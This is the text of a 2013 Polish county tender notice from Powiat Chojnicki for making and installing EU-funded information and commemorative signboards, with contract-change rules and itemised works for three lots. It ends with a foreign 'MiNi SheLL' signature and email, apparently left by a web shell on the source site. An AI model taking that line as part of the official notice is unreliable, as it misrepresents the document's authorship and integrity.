Zgodnie z zapisem § 4 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane: Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów (odniesienie do pkt. III 4.3.1 ogłoszenia), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 
W przypadku gdy wykonawca nie spełnia samodzielnie wymaganych warunków udziału w przedmiotowym postępowaniu składa pisemne zobowiązanie innego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (w oryginale) zgodnie z art. 26 ust. 2b ustawy Pzp. Zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda: Dokumentów dotyczących w szczególności (wg wzoru nr 6 do siwz)
a)zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia
c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla potrzeb Umowy, Siła Wyższa oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki.
Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
1)konieczności udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
a)z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby podniesienia niewspółmiernie wysokich kosztów,
b)prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego.
2)wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy, jeżeli te okoliczności będą trwały minimum 30 dni i Zamawiający uzna je za zasadne.
3)zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
4)wystąpienie siły wyższej,
5)skrócenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy,
6)wstrzymania przez zamawiającego wykonywania prac nie wynikających z okoliczności leżących po stronie wykonawcy.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w pkt 1-6, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.
Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie wartości przedmiotu umowy  w przypadku:
1) zmniejszenia zakresu przedmiotu umowy z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku:
1)wprowadzenia nowego podwykonawcy,
2)rezygnacji podwykonawcy,
3)zmiany wartości lub zakresu robót wykonywanych przez podwykonawców. 
Zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.
Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany osób wymienionych w umowie w przypadku:
1)śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych,   
2)zastrzeżeń jednej ze stron, co do kompetencji w/w osób. 
W takim przypadku nowa osoba musi spełniać wymagania określone w siwz.
Powyższe postanowienia stanowią katalog zmian, na które zamawiający może Wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.
Istotne dla Stron postanowienia zawiera wzór umowy, która stanowi integralną część niniejszej   SIWZ.
Zamawiający nie zamierza zawrzeć umowy ramowej.
W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić w formie pisemnej, pod rygorem nieważności takiego oświadczenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIAT CHOJNICKI 
ul. 31 Stycznia 56 
89-600 CHOJNICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 09:00, miejsce: Ofertę należy złożyć w
Starostwie Powiatowym w Chojnicach
ul. 31 Stycznia 56, 89-600 Chojnice
Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, 
CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych,pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, 
CZĘŚĆ III: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych p.n.
Wykonanie i montaż tablic informacyjnych, pamiątkowych.

CZĘŚĆ I: wykonanie i montaż tablicy pamiątkowej dla projektu pn. Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, 
Szczegółowe określenie przedmiotu zamówienia zawarte jest w Rozdziale D - SIWZ Opisie Przedmiotu Zamówienia, Rozdziale E- SIWZ Istotnych postanowieniach do umowy oraz załącznikach do SIWZ.

Dokumentacja projektowa, specyfikacja techniczna oraz dodatkowe dokumenty przekazane Wykonawcy stanowią część umowy, a wymagania wyszczególnione choćby w jednym z nich są obowiązujące dla Wykonawcy, tak jakby zawarte były w całej dokumentacji.

CZĘŚĆ I Wykonanie i montaż tablicy pamiątkowej dla projektu Zwiększenie atrakcyjności turystycznej powiatu chojnickiego poprzez budowę mostu zwodzonego w miejscowości Małe Swornegacie w ramach programu Kaszubska Marszruta zgodnie z projektem budowlanym stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.150.2013 z dnia 19 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót.
Zakres prac:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m 
i głębokości do 1,5m ze złożeniem urobku na odkład - 18,040 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,270 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,714 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,004 t
5)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,012 t
6)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków 
i budowli - 0,015 t
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 4,360 m2
8)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą -4,360 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,820 m2
10)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,820 m2
11)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 17,056 m3
12)Wywiezienie i przyjęcie ziemi na wysypisko - 0,984 m3
2.Tablica
1)Dostawa słupa drewnianego z drewna sosnowego litego, zaimpregnowanego, 
o średnicy 16cm z osadzonym płaskownikiem, podstawą słupa oraz elementami stalowymi niezbędnymi do przykręcenia tablic - 2,000 szt.
2)Dostawa i montaż kotew o średnicy M16 i głębokości zakotwienia hef=80mm, hnom=92mm - 8,000 szt.
3)Montaż słupów - 2,000 szt.
4)Dostawa tablicy poliwęglanowej - 1,000 szt.
5)Dostawa tablicy stalowej - 1,000 szt.
6)Montaż tablic - 2,000 szt.

3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 4
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport tablicy na miejsce oraz wbudowanie zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.150.2013 z dnia 19 marca 2013 r., w uzgodnieniu 
z Zamawiającym (miejscowość Małe Swornegacie) należy do Wykonawcy.
6.Montaż tablicy na punkcie widokowym (nawierzchnia z kostki betonowej) mostu zwodzonego w miejscowości Małe Swornegacie wraz z odtworzeniem nawierzchni - 1 kpl.
Załączniki do CZĘŚCI I:
załącznik nr 1 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 2 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 3 - przedmiar (dot. cz. I),
załącznik nr 4 - wizualizacja nadruku tablicy pamiątkowej,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II: wykonanie i montaż 7 tablic informacyjnych/pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych p.n.
Wykonanie i montaż tablic informacyjnych, pamiątkowych.

CZĘŚĆ II
Wykonanie i montaż 7 tablic informacyjnych,pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, w tym:
a)dwóch tablic zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy;
b)pięciu tablic zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy.
Dokumentacja projektowa, specyfikacja techniczna oraz dodatkowe dokumenty przekazane Wykonawcy stanowią część umowy, a wymagania wyszczególnione choćby w jednym z nich są obowiązujące dla Wykonawcy, tak jakby zawarte były w całej dokumentacji.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w Rozdziale D - SIWZ Opisie Przedmiotu Zamówienia, Rozdziale E- SIWZ Istotnych postanowieniach do umowy oraz załącznikach do SIWZ.

CZĘŚĆ II a)
Wykonanie i montaż dwóch tablic informacyjnych/pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy
Zakres prac przewidywany dla wykonania jednej tablicy:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m 
i głębokości do 1,5m ze złożeniem urobku na odkład - 19,866 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,272 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,628 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,003 t
5)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków 
i budowli - 0,0125 t
6)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 3,920 m2
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 3,920 m2
8)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,920 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,920 m2
10)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 18,966 m3
11)Wywiezienie i przyjęcie ziemi na wysypisko - 0,900 m3
2.Tablica
1)Dostawa gotowej konstrukcji stalowej malowanej proszkowo (słupki 2 x RO 101.6x4, dług. 4,8m, poprzeczki 2 x RO 42.2x3.2, dług. 2,1m, przewiązki RO 32x2, usztywnienie - płaskownik 30x2, obramowanie - kątownik - 122,034 kg
2)Montaż słupków stalowych (ustawienie na etapie zalewania stóp fundamentowych) - 2,000 szt.
3)Dostawa tablicy stalowej - 1,000 szt.
4)Montaż tablicy - 1,000 szt.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 8
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport i montaż tablicy zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.175.2013 z dnia 27 marca 2013 r., w uzgodnieniu z Zamawiającym  należy do Wykonawcy.
Załączniki do CZĘŚCI IIa:
załącznik nr 5 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 6 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 7 - przedmiar (dot. cz. IIa) - przedmiar opracowany dla wykonania jednej tablicy,
załącznik nr 8 - wizualizacja nadruku tablicy pamiątkowej,

CZĘŚĆ II b)

Wykonanie i montaż pięciu tablic informacyjnych,pamiątkowych dla projektu pn. Budowa tras rowerowych i infrastruktury turystycznej w powiecie chojnickim w ramach programu Kaszubska Marszruta dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z projektem stanowiącym załącznik do zgłoszenia robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r. oraz specyfikacją techniczną wykonania i odbioru robót wraz z montażem tablicy
Zakres prac przewidywany dla wykonania jednej tablicy:
1.Roboty ziemne i fundamentowe
1)Wykopy jamiste w gruncie kategorii I-II ze skarpami o szerokości dna do 1,5m 
i głębokości do 1,5m ze złożeniem urobku na odkład - 18,040 m3
2)Podkłady betonowe na podłożu gruntowym z betonu zwykłego - 0,270 m3
3)Stopy fundamentowe żelbetowe schodkowe o objętości do 2,5m3 z układaniem betonu z zastosowaniem pompy - 0,714 m3
4)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,004 t
5)Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli - 0,012 t
6)Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków 
i budowli - 0,015 t
7)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 4,360 m2
8)Izolacje przeciwwilgociowe powłokowe pionowe wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą -4,360 m2
9)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - pierwsza warstwa - 1,820 m2
10)Izolacje przeciwwilgociowe powłokowe poziome wykonywane na zimno z emulsji asfaltowej - każda następna warstwa ponad pierwszą - 1,820 m2
11)Zasypanie wykopów z przerzutem ziemi na odległość do 3m i ubiciem warstwami co 15cm w gruncie kategorii I-II - 17,056 m3
12)Wywiezienie i przyjęcie ziemi na wysypisko - 0,984 m3
2.Tablica
1)Dostawa słupa drewnianego z drewna sosnowego litego, zaimpregnowanego, o średnicy 16cm z osadzonym płaskownikiem, podstawą słupa oraz elementami stalowymi niezbędnymi do przykręcenia tablic - 2,000 szt.
2)Dostawa i montaż kotew o średnicy M16 i głębokości zakotwienia hef=80mm, hnom=92mm - 8,000 szt.
3)Montaż słupów - 2,000 szt.
4)Dostawa tablicy poliwęglanowej - 1,000 szt.
5)Dostawa tablicy stalowej - 1,000 szt.
6)Montaż tablic - 2,000 szt.

3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 12
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport i montaż tablicy zgodnie ze zgłoszeniem robót budowlanych znak AB.6743.312.2013 z dnia 30 kwietnia 2013 r., w uzgodnieniu z Zamawiającym należy do Wykonawcy.

Załączniki do CZĘŚCI IIb:
załącznik nr 9 - zgłoszenie robót budowlanych wraz z projektem,
załącznik nr 10 - specyfikacja techniczna wykonania i odbioru robót,
załącznik nr 11 - przedmiar (dot. cz. IIb) - przedmiar opracowany dla wykonania jednej tablicy,
załącznik nr 12 - wizualizacja nadruku tablicy pamiątkowej,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych p.n.

Wykonanie i montaż tablic informacyjnych, pamiątkowych

CZĘŚĆ III: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.

Dokumentacja projektowa, specyfikacja techniczna oraz dodatkowe dokumenty przekazane Wykonawcy stanowią część umowy, a wymagania wyszczególnione choćby w jednym z nich są obowiązujące dla Wykonawcy, tak jakby zawarte były w całej dokumentacji.
Szczegółowe określenie przedmiotu zamówienia zawarte jest w Rozdziale D - SIWZ Opisie Przedmiotu Zamówienia, Rozdziale E- SIWZ Istotnych postanowieniach do umowy oraz załącznikach do SIWZ.
Przedmiotem zamówienia jest: wykonanie i montaż tablic informacyjnych (4 szt.) i tablicy pamiątkowej (1 szt.) dla projektu pn. Termomodernizacja budynków użyteczności publicznej w powiecie chojnickim dofinansowanego z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, zgodnie z opisem tablic.

Zakres prac:
1.Tablice informacyjne i pamiątkowa jednostronne, kolorowe na dwóch metalowych słupach trwale związane z gruntem, wkopane w grunt na ok. 0,75 m.
2.Słupki w części podziemnej z podwójnymi poprzeczkami zalane betonem. Fundament betonowy o wymiarach: 0,75 m x 0,45 m x 0,45 m.
3.Nadruk graficzno-informacyjny zgodnie ze wzorem stanowiącym załącznik nr 2.
4.Materiał do wykonania nadruku graficzno-informacyjnego: odporny na warunki pogodowe, zapewniający wyraźne barwy.
5.Transport tablic na miejsce oraz wbudowanie zgodnie ze zgłoszeniem robót budowlanych, w uzgodnieniu z Zamawiającym, należy do Wykonawcy:
a)tablice informacyjne:
-działka nr 2021/15, ul. Świętopełka 1a, Chojnice
-działka nr 2212, ul. Dworcowa 1, Chojnice
-działka nr 2021/7, ul. Świętopełka 3, Chojnice
-działka nr 404/1, ul. Szkolna 3, Czersk
b)tablica pamiątkowa:
-działka nr 512/45, ul. Ogrodowa 2, Brusy

Załączniki do CZĘŚCI III:
załącznik nr 1 - zgłoszenie robót budowlanych wraz z opisem tablic,
załącznik nr 2 - wizualizacja nadruku tablic informacyjnych i tablicy pamiątkowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com